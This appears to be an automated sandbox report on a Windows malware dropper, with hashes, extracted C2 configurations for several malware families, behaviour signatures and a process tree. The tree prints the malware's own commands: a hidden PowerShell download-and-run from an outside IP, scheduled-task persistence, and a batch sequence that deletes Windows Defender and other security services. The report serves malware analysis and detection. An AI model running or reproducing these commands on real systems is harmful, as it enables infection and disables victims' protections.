Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/04/2025, 17:40

General

  • Target

    2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    1cbc80c77a01e855f05fe33a43a8e977

  • SHA1

    1db146c4e6de2e346c0691144cfa17147fc55815

  • SHA256

    78ff4b03b39c789d662f42471312a413b005f73e496a42d4b5e7b8e18cfa84b4

  • SHA512

    453374671899392bf93fa9ea6b1070fd0981832d120092c3c9a839e43438189e8612b487b31bb35ab50595eb5f878c377a23469d746ebb56994d560e4742d91b

  • SSDEEP

    24576:TqDEvCTbMWu7rQYlBQcBiT6rprG8a0Nu:TTvC/MTQYxsWR7a0N

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://hadvennture.top/GKsiio

https://anavstarx.shop/FoaJSi

https://wstarcloc.bet/GOksAo

https://atargett.top/dsANGt

Extracted

Family

quasar

Version

1.4.1

Botnet

CyberPunk

C2

dakar.wohowoho.com:443

dakar.wohowoho.com:80

206.206.76.75:443

206.206.76.75:80

62.60.226.176:80

62.60.226.176:443

Mutex

5e809a5b-bb22-41b6-af20-5285e99040d3

Attributes
  • encryption_key

    A98DEEE2D49BDF1C5183B3079E9B28E281586F6F

  • install_name

    chrome.exe

  • log_directory

    Logs

  • reconnect_delay

    30000

  • startup_key

    GoogleChrome

  • subdirectory

    Google\Chrome

Extracted

Family

amadey

Version

5.33

Botnet

faec90

Attributes
  • install_dir

    52907c9546

  • install_file

    tgvazx.exe

  • strings_key

    cc9d94f7503394295f4824f8cfd50608

  • url_paths

    /Di0Her478/index.php

rc4.plain

Extracted

Family

warmcookie

C2

192.36.57.50

Attributes
  • mutex

    62580f79-f0e4-46c9-9fe6-041328dce2b7

  • user_agent

    Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies security service 2 TTPs 2 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Warmcookie family
  • Warmcookie, Badspace

    Warmcookie aka Badspace is a backdoor written in C++.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 14 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 12 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 43 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 29 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 18 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 24 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 60 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 54 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2616
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:4652
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:4792
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:3468
    • C:\Users\Admin\AppData\Local\Temp\2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:1156
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /create /tn aibuVmaBZ6h /tr "mshta C:\Users\Admin\AppData\Local\Temp\AhOrZxpaK.hta" /sc minute /mo 25 /ru "Admin" /f
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1848
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn aibuVmaBZ6h /tr "mshta C:\Users\Admin\AppData\Local\Temp\AhOrZxpaK.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:840
      • C:\Windows\SysWOW64\mshta.exe
        mshta C:\Users\Admin\AppData\Local\Temp\AhOrZxpaK.hta
        2⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1072
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RYG1HCKJMQRKDB89IPOYX9TD945Q4YBU.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4440
          • C:\Users\Admin\AppData\Local\TempRYG1HCKJMQRKDB89IPOYX9TD945Q4YBU.EXE
            "C:\Users\Admin\AppData\Local\TempRYG1HCKJMQRKDB89IPOYX9TD945Q4YBU.EXE"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3964
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1568
              • C:\Users\Admin\AppData\Local\Temp\10404930101\PQPYAYJJ.exe
                "C:\Users\Admin\AppData\Local\Temp\10404930101\PQPYAYJJ.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:5184
                • C:\Users\Admin\Abspawnhlp.exe
                  "C:\Users\Admin\Abspawnhlp.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:5680
                  • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                    C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of WriteProcessMemory
                    PID:340
                    • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                      C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                      9⤵
                      • Downloads MZ/PE file
                      • Checks computer location settings
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • System Location Discovery: System Language Discovery
                      • Modifies registry class
                      PID:5876
                      • C:\Windows\SysWOW64\msiexec.exe
                        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000910271\FRDKTUCO.msi" /quiet
                        10⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4540
                      • C:\Users\Admin\AppData\Local\Temp\10000920101\LXUZVRLG.exe
                        "C:\Users\Admin\AppData\Local\Temp\10000920101\LXUZVRLG.exe"
                        10⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:6084
                        • C:\Users\Admin\Abspawnhlp.exe
                          "C:\Users\Admin\Abspawnhlp.exe"
                          11⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious behavior: MapViewOfSection
                          PID:2008
                          • C:\Users\Admin\Abspawnhlp.exe
                            C:\Users\Admin\Abspawnhlp.exe
                            12⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            PID:5676
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\SysWOW64\cmd.exe
                            12⤵
                            • System Location Discovery: System Language Discovery
                            PID:3152
                      • C:\Users\Admin\AppData\Local\Temp\10000930101\890172171_x64.exe
                        "C:\Users\Admin\AppData\Local\Temp\10000930101\890172171_x64.exe"
                        10⤵
                        • Executes dropped EXE
                        • Drops file in Windows directory
                        PID:1052
                      • C:\Windows\SysWOW64\msiexec.exe
                        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000950271\UVXEUGTZ.msi" /quiet
                        10⤵
                        • System Location Discovery: System Language Discovery
                        PID:5892
                      • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                        "C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe"
                        10⤵
                        • Executes dropped EXE
                        PID:6132
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 6132 -s 80
                          11⤵
                          • Program crash
                          PID:6012
                      • C:\Windows\SysWOW64\msiexec.exe
                        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000970271\NBFRPMVB.msi" /quiet
                        10⤵
                        • System Location Discovery: System Language Discovery
                        PID:4904
                      • C:\Users\Admin\AppData\Local\Temp\10000980101\IEYKSCXV.exe
                        "C:\Users\Admin\AppData\Local\Temp\10000980101\IEYKSCXV.exe"
                        10⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:2344
                      • C:\Users\Admin\AppData\Local\Temp\10000991101\KRWXARXD.exe
                        "C:\Users\Admin\AppData\Local\Temp\10000991101\KRWXARXD.exe"
                        10⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:3452
                        • C:\Users\Admin\CamMenuMaker.exe
                          "C:\Users\Admin\CamMenuMaker.exe"
                          11⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: MapViewOfSection
                          PID:4492
                          • C:\Users\Admin\CamMenuMaker.exe
                            C:\Users\Admin\CamMenuMaker.exe
                            12⤵
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: AddClipboardFormatListener
                            PID:3928
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Enc UgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAJwB3AGkAdwBlAHIANwAuADUALgBlAHgAZQAnACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAdwBpAHcAZQByADcALgA1AC4AZQB4AGUAJwApACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0ATwBuAGMAZQAgAC0AQQB0ACAAKABHAGUAdAAtAEQAYQB0AGUAKQAgAC0AUgBlAHAAZQB0AGkAdABpAG8AbgBJAG4AdABlAHIAdgBhAGwAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBNAGkAbgB1AHQAZQBzACAANQApACkAIAAtAFUAcwBlAHIAIAAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlACAALQBSAHUAbgBMAGUAdgBlAGwAIABIAGkAZwBoAGUAcwB0ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0AUwBlAGMAbwBuAGQAcwAgADAAKQAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAKQAgAC0ARgBvAHIAYwBlAA==
                              13⤵
                              • Command and Scripting Interpreter: PowerShell
                              • System Location Discovery: System Language Discovery
                              PID:1352
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\SysWOW64\cmd.exe
                            12⤵
                            • Drops file in Windows directory
                            • System Location Discovery: System Language Discovery
                            PID:1052
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\SysWOW64\cmd.exe
                      9⤵
                      • Drops file in Windows directory
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3824
              • C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe
                "C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:4460
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:5852
              • C:\Users\Admin\AppData\Local\Temp\10405830101\NHq7LaU.exe
                "C:\Users\Admin\AppData\Local\Temp\10405830101\NHq7LaU.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2688
                • C:\Windows\SYSTEM32\schtasks.exe
                  "schtasks" /create /tn "GoogleChrome" /sc ONLOGON /tr "C:\ProgramData\Google\Chrome\chrome.exe" /rl HIGHEST /f
                  7⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:3988
                • C:\ProgramData\Google\Chrome\chrome.exe
                  "C:\ProgramData\Google\Chrome\chrome.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:4068
                  • C:\Windows\SYSTEM32\schtasks.exe
                    "schtasks" /create /tn "GoogleChrome" /sc ONLOGON /tr "C:\ProgramData\Google\Chrome\chrome.exe" /rl HIGHEST /f
                    8⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:444
              • C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe
                "C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:760
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3252
              • C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe
                "C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:3964
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                    PID:4948
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    7⤵
                      PID:5024
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      7⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4908
                  • C:\Users\Admin\AppData\Local\Temp\10407870101\apple.exe
                    "C:\Users\Admin\AppData\Local\Temp\10407870101\apple.exe"
                    6⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:5220
                    • C:\Users\Admin\AppData\Local\Temp\261.exe
                      "C:\Users\Admin\AppData\Local\Temp\261.exe"
                      7⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:1892
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4FFF.tmp\5000.tmp\5001.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
                        8⤵
                          PID:5680
                          • C:\Users\Admin\AppData\Local\Temp\261.exe
                            "C:\Users\Admin\AppData\Local\Temp\261.exe" go
                            9⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:5964
                            • C:\Windows\system32\cmd.exe
                              "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5186.tmp\5187.tmp\5188.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
                              10⤵
                              • Drops file in Program Files directory
                              PID:5992
                              • C:\Windows\system32\sc.exe
                                sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                                11⤵
                                • Launches sc.exe
                                PID:1348
                              • C:\Windows\system32\sc.exe
                                sc start ddrver
                                11⤵
                                • Launches sc.exe
                                PID:4648
                              • C:\Windows\system32\timeout.exe
                                timeout /t 1
                                11⤵
                                • Delays execution with timeout.exe
                                PID:1172
                              • C:\Windows\system32\sc.exe
                                sc stop ddrver
                                11⤵
                                • Launches sc.exe
                                PID:2104
                              • C:\Windows\system32\sc.exe
                                sc start ddrver
                                11⤵
                                • Launches sc.exe
                                PID:3940
                              • C:\Windows\system32\takeown.exe
                                takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                                11⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:5852
                              • C:\Windows\system32\icacls.exe
                                icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                                11⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:4016
                              • C:\Windows\system32\sc.exe
                                sc stop "WinDefend"
                                11⤵
                                • Launches sc.exe
                                PID:1060
                              • C:\Windows\system32\sc.exe
                                sc delete "WinDefend"
                                11⤵
                                • Launches sc.exe
                                PID:2672
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                                11⤵
                                  PID:2008
                                • C:\Windows\system32\sc.exe
                                  sc stop "MDCoreSvc"
                                  11⤵
                                  • Launches sc.exe
                                  PID:5812
                                • C:\Windows\system32\sc.exe
                                  sc delete "MDCoreSvc"
                                  11⤵
                                  • Launches sc.exe
                                  PID:2720
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                                  11⤵
                                    PID:3584
                                  • C:\Windows\system32\sc.exe
                                    sc stop "WdNisSvc"
                                    11⤵
                                    • Launches sc.exe
                                    PID:2612
                                  • C:\Windows\system32\sc.exe
                                    sc delete "WdNisSvc"
                                    11⤵
                                    • Launches sc.exe
                                    PID:2020
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                                    11⤵
                                      PID:4480
                                    • C:\Windows\system32\sc.exe
                                      sc stop "Sense"
                                      11⤵
                                      • Launches sc.exe
                                      PID:2604
                                    • C:\Windows\system32\sc.exe
                                      sc delete "Sense"
                                      11⤵
                                      • Launches sc.exe
                                      PID:6068
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                                      11⤵
                                        PID:1196
                                      • C:\Windows\system32\sc.exe
                                        sc stop "wscsvc"
                                        11⤵
                                        • Launches sc.exe
                                        PID:2688
                                      • C:\Windows\system32\sc.exe
                                        sc delete "wscsvc"
                                        11⤵
                                        • Launches sc.exe
                                        PID:800
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                        11⤵
                                        • Modifies security service
                                        PID:2036
                                      • C:\Windows\system32\sc.exe
                                        sc stop "SgrmBroker"
                                        11⤵
                                        • Launches sc.exe
                                        PID:5100
                                      • C:\Windows\system32\sc.exe
                                        sc delete "SgrmBroker"
                                        11⤵
                                        • Launches sc.exe
                                        PID:5800
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                        11⤵
                                          PID:608
                                        • C:\Windows\system32\sc.exe
                                          sc stop "SecurityHealthService"
                                          11⤵
                                          • Launches sc.exe
                                          PID:1056
                                        • C:\Windows\system32\sc.exe
                                          sc delete "SecurityHealthService"
                                          11⤵
                                          • Launches sc.exe
                                          PID:1052
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                          11⤵
                                            PID:3468
                                          • C:\Windows\system32\sc.exe
                                            sc stop "webthreatdefsvc"
                                            11⤵
                                            • Launches sc.exe
                                            PID:4292
                                          • C:\Windows\system32\sc.exe
                                            sc delete "webthreatdefsvc"
                                            11⤵
                                            • Launches sc.exe
                                            PID:3452
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                            11⤵
                                              PID:2320
                                            • C:\Windows\system32\sc.exe
                                              sc stop "webthreatdefusersvc"
                                              11⤵
                                              • Launches sc.exe
                                              PID:844
                                            • C:\Windows\system32\sc.exe
                                              sc delete "webthreatdefusersvc"
                                              11⤵
                                              • Launches sc.exe
                                              PID:5756
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                              11⤵
                                                PID:5940
                                              • C:\Windows\system32\sc.exe
                                                sc stop "WdNisDrv"
                                                11⤵
                                                • Launches sc.exe
                                                PID:4772
                                              • C:\Windows\system32\sc.exe
                                                sc delete "WdNisDrv"
                                                11⤵
                                                • Launches sc.exe
                                                PID:5676
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                                11⤵
                                                  PID:2280
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "WdBoot"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:4368
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "WdBoot"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:1156
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                                  11⤵
                                                    PID:3212
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop "WdFilter"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:4036
                                                  • C:\Windows\system32\sc.exe
                                                    sc delete "WdFilter"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:4332
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                                    11⤵
                                                      PID:4500
                                                    • C:\Windows\system32\sc.exe
                                                      sc stop "SgrmAgent"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:4776
                                                    • C:\Windows\system32\sc.exe
                                                      sc delete "SgrmAgent"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:4504
                                                    • C:\Windows\system32\reg.exe
                                                      reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                      11⤵
                                                        PID:6104
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop "MsSecWfp"
                                                        11⤵
                                                        • Launches sc.exe
                                                        PID:3708
                                                      • C:\Windows\system32\sc.exe
                                                        sc delete "MsSecWfp"
                                                        11⤵
                                                        • Launches sc.exe
                                                        PID:5380
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                        11⤵
                                                          PID:1756
                                                        • C:\Windows\system32\sc.exe
                                                          sc stop "MsSecFlt"
                                                          11⤵
                                                          • Launches sc.exe
                                                          PID:2668
                                                        • C:\Windows\system32\sc.exe
                                                          sc delete "MsSecFlt"
                                                          11⤵
                                                          • Launches sc.exe
                                                          PID:2132
                                                        • C:\Windows\system32\reg.exe
                                                          reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                          11⤵
                                                            PID:4048
                                                          • C:\Windows\system32\sc.exe
                                                            sc stop "MsSecCore"
                                                            11⤵
                                                            • Launches sc.exe
                                                            PID:4672
                                                          • C:\Windows\system32\sc.exe
                                                            sc delete "MsSecCore"
                                                            11⤵
                                                            • Launches sc.exe
                                                            PID:4516
                                                          • C:\Windows\system32\reg.exe
                                                            reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                            11⤵
                                                              PID:6128
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                              11⤵
